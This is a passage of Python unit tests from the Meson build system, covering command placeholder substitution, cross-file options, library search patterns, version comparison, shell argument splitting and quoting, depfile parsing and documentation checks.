ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, two outputs outputs = ['dir/out.c', 'dir/out2.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[2:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir']) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Many outputs, can't use @OUTPUT@ like this cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) def test_needs_exe_wrapper_override(self): config = ConfigParser() config['binaries'] = { 'c': '\'/usr/bin/gcc\'', } config['host_machine'] = { 'system': '\'linux\'', 'cpu_family': '\'arm\'', 'cpu': '\'armv7\'', 'endian': '\'little\'', } # Can not be used as context manager because we need to # open it a second time and this is not possible on # Windows. configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.flush() configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) detected_value = env.need_exe_wrapper() os.unlink(configfilename) desired_value = not detected_value config['properties'] = { 'needs_exe_wrapper': 'true' if desired_value else 'false' } configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False) configfilename = configfile.name config.write(configfile) configfile.close() opts = get_fake_options() opts.cross_file = (configfilename,) env = get_fake_env(opts=opts) forced_value = env.need_exe_wrapper() os.unlink(configfilename) self.assertEqual(forced_value, desired_value) def test_listify(self): listify = mesonbuild.mesonlib.listify # Test sanity self.assertEqual([1], listify(1)) self.assertEqual([], listify([])) self.assertEqual([1], listify([1])) # Test flattening self.assertEqual([1, 2, 3], listify([1, [2, 3]])) self.assertEqual([1, 2, 3], listify([1, [2, [3]]])) self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False)) # Test flattening and unholdering holder1 = ObjectHolder(1) self.assertEqual([holder1], listify(holder1)) self.assertEqual([holder1], listify([holder1])) self.assertEqual([holder1, 2], listify([holder1, 2])) self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]])) def test_unholder(self): unholder = mesonbuild.mesonlib.unholder holder1 = ObjectHolder(1) holder3 = ObjectHolder(3) holders = [holder1, holder3] self.assertEqual(1, unholder(holder1)) self.assertEqual([1], unholder([holder1])) self.assertEqual([1, 3], unholder(holders)) def test_extract_as_list(self): extract = mesonbuild.mesonlib.extract_as_list # Test sanity kwargs = {'sources': [1, 2, 3]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) self.assertEqual(kwargs, {'sources': [1, 2, 3]}) self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True)) self.assertEqual(kwargs, {}) # Test unholding holder3 = ObjectHolder(3) kwargs = {'sources': [1, 2, holder3]} self.assertEqual(kwargs, {'sources': [1, 2, holder3]}) # flatten nested lists kwargs = {'sources': [1, [2, [3]]]} self.assertEqual([1, 2, 3], extract(kwargs, 'sources')) def test_pkgconfig_module(self): dummystate = mock.Mock() dummystate.subproject = 'dummy' _mock = mock.Mock(spec=mesonbuild.dependencies.ExternalDependency) _mock.pcdep = mock.Mock() _mock.pcdep.name = "some_name" _mock.version_reqs = [] _mock = mock.Mock(held_object=_mock) # pkgconfig dependency as lib deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_libs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") # pkgconfig dependency as requires deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib") deps.add_pub_reqs([_mock]) self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name") def _test_all_naming(self, cc, env, patterns, platform): shr = patterns[platform]['shared'] stc = patterns[platform]['static'] shrstc = shr + tuple([x for x in stc if x not in shr]) stcshr = stc + tuple([x for x in shr if x not in stc]) p = cc.get_library_naming(env, LibType.SHARED) self.assertEqual(p, shr) p = cc.get_library_naming(env, LibType.STATIC) self.assertEqual(p, stc) p = cc.get_library_naming(env, LibType.PREFER_STATIC) self.assertEqual(p, stcshr) p = cc.get_library_naming(env, LibType.PREFER_SHARED) self.assertEqual(p, shrstc) # Test find library by mocking up openbsd if platform != 'openbsd': return with tempfile.TemporaryDirectory() as tmpdir: with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f: f.write('') with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f: f.write('') found = cc._find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED) self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0') def test_find_library_patterns(self): ''' Unit test for the library search patterns used by find_library() ''' unix_static = ('lib{}.a', '{}.a') msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib') # This is the priority list of pattern matching for library searching patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'), 'static': unix_static}, 'linux': {'shared': ('lib{}.so', '{}.so'), 'static': unix_static}, 'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'), 'static': unix_static}, 'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll', 'lib{}.dll.a', '{}.dll', '{}.dll.a'), 'static': ('cyg{}.a',) + unix_static}, 'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'), 'static': msvc_static}, 'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll', '{}.dll.a', '{}.lib', '{}.dll'), 'static': msvc_static}} env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if is_osx(): self._test_all_naming(cc, env, patterns, 'darwin') elif is_cygwin(): self._test_all_naming(cc, env, patterns, 'cygwin') elif is_windows(): if cc.get_argument_syntax() == 'msvc': self._test_all_naming(cc, env, patterns, 'windows-msvc') else: self._test_all_naming(cc, env, patterns, 'windows-mingw') elif is_openbsd(): self._test_all_naming(cc, env, patterns, 'openbsd') else: self._test_all_naming(cc, env, patterns, 'linux') env.machines.host.system = 'openbsd' self._test_all_naming(cc, env, patterns, 'openbsd') env.machines.host.system = 'darwin' self._test_all_naming(cc, env, patterns, 'darwin') env.machines.host.system = 'cygwin' self._test_all_naming(cc, env, patterns, 'cygwin') env.machines.host.system = 'windows' self._test_all_naming(cc, env, patterns, 'windows-mingw') @skipIfNoPkgconfig def test_pkgconfig_parse_libs(self): ''' Unit test for parsing of pkg-config output to search for libraries https://github.com/mesonbuild/meson/issues/3951 ''' def create_static_lib(name): if not is_osx(): name.open('w').close() return src = name.with_suffix('.c') out = name.with_suffix('.o') with src.open('w') as f: f.write('int meson_foobar (void) { return 0; }') subprocess.check_call(['clang', '-c', str(src), '-o', str(out)]) subprocess.check_call(['ar', 'csr', str(name), str(out)]) with tempfile.TemporaryDirectory() as tmpdir: pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True) env = get_fake_env() compiler = env.detect_c_compiler(MachineChoice.HOST) env.coredata.compilers.host = {'c': compiler} env.coredata.options[OptionKey('link_args', lang='c')] = FakeCompilerOptions() p1 = Path(tmpdir) / '1' p2 = Path(tmpdir) / '2' p1.mkdir() p2.mkdir() # libfoo.a is in one prefix create_static_lib(p1 / 'libfoo.a') # libbar.a is in both prefixes create_static_lib(p1 / 'libbar.a') create_static_lib(p2 / 'libbar.a') # Ensure that we never statically link to these create_static_lib(p1 / 'libpthread.a') create_static_lib(p1 / 'libm.a') create_static_lib(p1 / 'libc.a') create_static_lib(p1 / 'libdl.a') create_static_lib(p1 / 'librt.a') def fake_call_pkgbin(self, args, env=None): if '--libs' not in args: return 0, '', '' if args[-1] == 'foo': return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), '' if args[-1] == 'bar': return 0, '-L{} -lbar'.format(p2.as_posix()), '' if args[-1] == 'internal': return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), '' old_call = PkgConfigDependency._call_pkgbin old_check = PkgConfigDependency.check_pkgconfig PkgConfigDependency._call_pkgbin = fake_call_pkgbin PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin # Test begins try: kwargs = {'required': True, 'silent': True} foo_dep = PkgConfigDependency('foo', env, kwargs) self.assertEqual(foo_dep.get_link_args(), [(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()]) bar_dep = PkgConfigDependency('bar', env, kwargs) self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()]) internal_dep = PkgConfigDependency('internal', env, kwargs) if compiler.get_argument_syntax() == 'msvc': self.assertEqual(internal_dep.get_link_args(), []) else: link_args = internal_dep.get_link_args() for link_arg in link_args: for lib in ('pthread', 'm', 'c', 'dl', 'rt'): self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args) finally: # Test ends PkgConfigDependency._call_pkgbin = old_call PkgConfigDependency.check_pkgconfig = old_check # Reset dependency class to ensure that in-process configure doesn't mess up PkgConfigDependency.pkgbin_cache = {} PkgConfigDependency.class_pkgbin = PerMachine(None, None) def test_version_compare(self): comparefunc = mesonbuild.mesonlib.version_compare_many for (a, b, result) in [ ('0.99.beta19', '>= 0.99.beta14', True), ]: self.assertEqual(comparefunc(a, b)[0], result) for (a, b, op) in [ # examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison ("1.0010", "1.9", operator.gt), ("1.05", "1.5", operator.eq), ("1.0", "1", operator.gt), ("2.50", "2.5", operator.gt), ("fc4", "fc.4", operator.eq), ("FC5", "fc4", operator.lt), ("2a", "2.0", operator.lt), ("1.0", "1.fc4", operator.gt), ("3.0.0_fc", "3.0.0.fc", operator.eq), # from RPM tests ("1.0", "1.0", operator.eq), ("1.0", "2.0", operator.lt), ("2.0", "1.0", operator.gt), ("2.0.1", "2.0.1", operator.eq), ("2.0", "2.0.1", operator.lt), ("2.0.1", "2.0", operator.gt), ("2.0.1a", "2.0.1a", operator.eq), ("2.0.1a", "2.0.1", operator.gt), ("2.0.1", "2.0.1a", operator.lt), ("5.5p1", "5.5p1", operator.eq), ("5.5p1", "5.5p2", operator.lt), ("5.5p2", "5.5p1", operator.gt), ("5.5p10", "5.5p10", operator.eq), ("5.5p1", "5.5p10", operator.lt), ("5.5p10", "5.5p1", operator.gt), ("10xyz", "10.1xyz", operator.lt), ("10.1xyz", "10xyz", operator.gt), ("xyz10", "xyz10", operator.eq), ("xyz10", "xyz10.1", operator.lt), ("xyz10.1", "xyz10", operator.gt), ("xyz.4", "xyz.4", operator.eq), ("xyz.4", "8", operator.lt), ("8", "xyz.4", operator.gt), ("xyz.4", "2", operator.lt), ("2", "xyz.4", operator.gt), ("5.5p2", "5.6p1", operator.lt), ("5.6p1", "5.5p2", operator.gt), ("5.6p1", "6.5p1", operator.lt), ("6.5p1", "5.6p1", operator.gt), ("6.0.rc1", "6.0", operator.gt), ("6.0", "6.0.rc1", operator.lt), ("10b2", "10a1", operator.gt), ("10a2", "10b2", operator.lt), ("1.0aa", "1.0aa", operator.eq), ("1.0a", "1.0aa", operator.lt), ("1.0aa", "1.0a", operator.gt), ("10.0001", "10.0001", operator.eq), ("10.0001", "10.1", operator.eq), ("10.1", "10.0001", operator.eq), ("10.0001", "10.0039", operator.lt), ("10.0039", "10.0001", operator.gt), ("4.999.9", "5.0", operator.lt), ("5.0", "4.999.9", operator.gt), ("20101121", "20101121", operator.eq), ("20101121", "20101122", operator.lt), ("20101122", "20101121", operator.gt), ("2_0", "2_0", operator.eq), ("2.0", "2_0", operator.eq), ("2_0", "2.0", operator.eq), ("a", "a", operator.eq), ("a+", "a+", operator.eq), ("a+", "a_", operator.eq), ("a_", "a+", operator.eq), ("+a", "+a", operator.eq), ("+a", "_a", operator.eq), ("_a", "+a", operator.eq), ("+_", "+_", operator.eq), ("_+", "+_", operator.eq), ("_+", "_+", operator.eq), ("+", "_", operator.eq), ("_", "+", operator.eq), # other tests ('0.99.beta19', '0.99.beta14', operator.gt), ("1.0.0", "2.0.0", operator.lt), (".0.0", "2.0.0", operator.lt), ("alpha", "beta", operator.lt), ("1.0", "1.0.0", operator.lt), ("2.456", "2.1000", operator.lt), ("2.1000", "3.111", operator.lt), ("2.001", "2.1", operator.eq), ("2.34", "2.34", operator.eq), ("6.1.2", "6.3.8", operator.lt), ("1.7.3.0", "2.0.0", operator.lt), ("2.24.51", "2.25", operator.lt), ("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt), ("3.4.1", "3.4b1", operator.gt), ("041206", "200090325", operator.lt), ("0.6.2+git20130413", "0.6.2", operator.gt), ("2.6.0+bzr6602", "2.6.0", operator.gt), ("2.6.0", "2.6b2", operator.gt), ("2.6.0+bzr6602", "2.6b2x", operator.gt), ("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt), ("15.8b", "15.8.0.1", operator.lt), ("1.2rc1", "1.2.0", operator.lt), ]: ver_a = Version(a) ver_b = Version(b) if op is operator.eq: for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.lt: for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) if op is operator.gt: for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]: self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]: self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b)) def test_msvc_toolset_version(self): ''' Ensure that the toolset version returns the correct value for this MSVC ''' env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if cc.get_argument_syntax() != 'msvc': raise unittest.SkipTest('Test only applies to MSVC-like compilers') toolset_ver = cc.get_toolset_version() self.assertIsNotNone(toolset_ver) # Visual Studio 2015 and older versions do not define VCToolsVersion # TODO: ICL doesn't set this in the VSC2015 profile either if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910: return if 'VCToolsVersion' in os.environ: vctools_ver = os.environ['VCToolsVersion'] else: self.assertIn('VCINSTALLDIR', os.environ) # See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/ vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text() self.assertTrue(vctools_ver.startswith(toolset_ver), msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver)) def test_split_args(self): split_args = mesonbuild.mesonlib.split_args join_args = mesonbuild.mesonlib.join_args if is_windows(): test_data = [ # examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments (r'"a b c" d e', ['a b c', 'd', 'e'], True), (r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False), (r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False), (r'a\\\"b c d', [r'a\"b', 'c', 'd'], False), (r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False), # other basics (r'""', [''], True), (r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True), (r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True), (r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True), (r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), # more illustrative tests (r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True), (r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True), (r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True), (r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False), (r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True), (r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True), (r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True), (r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False), (r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False), (r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True), (r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False), (r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False), (r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False), (r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True), ] else: test_data = [ (r"'a b c' d e", ['a b c', 'd', 'e'], True), (r"a/b/c d e", ['a/b/c', 'd', 'e'], True), (r"a\b\c d e", [r'abc', 'd', 'e'], False), (r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False), (r'"a b c" d e', ['a b c', 'd', 'e'], False), (r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False), (r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True), (r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True), (r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False), (r"'a & b & c d e'", ['a & b & c d e'], True), (r"abd'e f'g h", [r'abde fg', 'h'], False), ('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False), ('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False), ("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True), ('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False), ("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True), ] for (cmd, expected, roundtrip) in test_data: self.assertEqual(split_args(cmd), expected) if roundtrip: self.assertEqual(join_args(expected), cmd) def test_quote_arg(self): split_args = mesonbuild.mesonlib.split_args quote_arg = mesonbuild.mesonlib.quote_arg if is_windows(): test_data = [ ('', '""'), ('arg1', 'arg1'), ('/option1', '/option1'), ('/Ovalue', '/Ovalue'), ('/OBob&Alice', '/OBob&Alice'), ('/Ovalue with spaces', r'"/Ovalue with spaces"'), (r'/O"value with spaces"', r'"/O\"value with spaces\""'), (r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'), ('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'), ('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'), (r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'), ] else: test_data = [ ('arg1', 'arg1'), ('--option1', '--option1'), ('-O=value', '-O=value'), ('-O=Bob&Alice', "'-O=Bob&Alice'"), ('-O=value with spaces', "'-O=value with spaces'"), ('-O="value with spaces"', '\'-O=\"value with spaces\"\''), ('-O=/path with spaces/test', '\'-O=/path with spaces/test\''), ('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"), ] for (arg, expected) in test_data: self.assertEqual(quote_arg(arg), expected) self.assertEqual(split_args(expected)[0], arg) def test_depfile(self): for (f, target, expdeps) in [ # empty, unknown target ([''], 'unknown', set()), # simple target & deps (['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})), (['meson/foo.o: foo.c foo.h'], 'foo.c', set()), # get all deps (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})), (['meson/foo.o: foo.c foo.h', 'foo.c: gen.py'], 'foo.c', set({'gen.py'})), # linue continuation, multiple targets (['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})), (['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})), # \\ handling (['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})), # $ handling (['f$o.o: c/b'], 'f$o.o', set({'c/b'})), (['f$$o.o: c/b'], 'f$o.o', set({'c/b'})), # cycles (['a: b', 'b: a'], 'a', set({'a', 'b'})), (['a: b', 'b: a'], 'b', set({'a', 'b'})), ]: d = mesonbuild.depfile.DepFile(f) deps = d.get_all_dependencies(target) self.assertEqual(sorted(deps), sorted(expdeps)) def test_log_once(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once('foo') mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual, 'foo', actual) def test_log_once_ansi(self): f = io.StringIO() with mock.patch('mesonbuild.mlog.log_file', f), \ mock.patch('mesonbuild.mlog._logged_once', set()): mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo')) actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) mesonbuild.mlog.log_once('foo') actual = f.getvalue().strip() self.assertEqual(actual.count('foo'), 1, actual) f.truncate() mesonbuild.mlog.warning('bar', once=True) mesonbuild.mlog.warning('bar', once=True) actual = f.getvalue().strip() self.assertEqual(actual.count('bar'), 1, actual) def test_sort_libpaths(self): sort_libpaths = mesonbuild.dependencies.base.sort_libpaths self.assertEqual(sort_libpaths( ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) self.assertEqual(sort_libpaths( ['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'], ['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']), ['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib']) def test_dependency_factory_order(self): b = mesonbuild.dependencies.base with tempfile.TemporaryDirectory() as tmpdir: with chdir(tmpdir): env = get_fake_env() env.scratch_dir = tmpdir f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake']) f = b.DependencyFactory( 'test_dep', methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG] ) actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})] self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig']) def test_validate_json(self) -> None: """Validate the json schema for the test cases.""" try: from jsonschema import validate, ValidationError except ImportError: if is_ci(): raise raise unittest.SkipTest('Python jsonschema module not found.') with Path('data/test.schema.json').open() as f: schema = json.load(f) errors = [] # type: T.Tuple[str, Exception] for p in Path('test cases').glob('**/test.json'): with p.open() as f: try: validate(json.load(f), schema=schema) except ValidationError as e: errors.append((p.resolve(), e)) for f, e in errors: print('Failed to validate: "{}"'.format(f)) print(str(e)) self.assertFalse(errors) @unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release') class DataTests(unittest.TestCase): def test_snippets(self): hashcounter = re.compile('^ *(#)+') snippet_dir = Path('docs/markdown/snippets') self.assertTrue(snippet_dir.is_dir()) for f in snippet_dir.glob('*'): self.assertTrue(f.is_file()) if f.parts[-1].endswith('~'): continue if f.suffix == '.md': in_code_block = False with f.open() as snippet: for line in snippet: if line.startswith(' '): continue if line.startswith('```'): in_code_block = not in_code_block if in_code_block: continue m = re.match(hashcounter, line) if m: self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name) self.assertFalse(in_code_block, 'Unclosed code block.') else: if f.name != 'add_release_note_snippets_here': self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name) def test_compiler_options_documented(self): ''' Test that C and C++ compiler options and base options are documented in Builtin-Options.md. Only tests the default compiler for the current platform on the CI. ''' md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) env = get_fake_env() # FIXME: Support other compilers cc = env.detect_c_compiler(MachineChoice.HOST) cpp = env.detect_cpp_compiler(MachineChoice.HOST) for comp in (cc, cpp): for opt in comp.get_options(): self.assertIn(str(opt), md) for opt in comp.base_options: self.assertIn(str(opt), md) self.assertNotIn('b_unknown', md) @staticmethod def _get_section_content(name, sections, md): for section in sections: if section and section.group(1) == name: try: next_section = next(sections) end = next_section.start() except StopIteration: end = len(md) # Extract the content for this section return md[section.end():end] raise RuntimeError('Could not find "{}" heading'.format(name)) def test_builtin_options_documented(self): ''' Test that universal options and base options are documented in Builtin-Options.md. ''' from itertools import tee md = None with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f: md = f.read() self.assertIsNotNone(md) found_entries = set() sections = re.finditer(r"^## (.+)$", md, re.MULTILINE) # Extract the content for this section content = self._get_section_content("Universal options", sections, md) subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE)) subcontent1 = self._get_section_content("Directories", subsections[0], content) subcontent2 = self._get_section_content("Core options", subsections[1], content) for subcontent in (subcontent1, subcontent2): # Find the option names options = set() # Match either a table row or a table heading separator: | ------ | rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE) # Skip the header of the first table next(rows) # Skip the heading separator of the first table next(rows) for m in rows: value = m.group(1) # End when the `buildtype` table starts if value is None: break 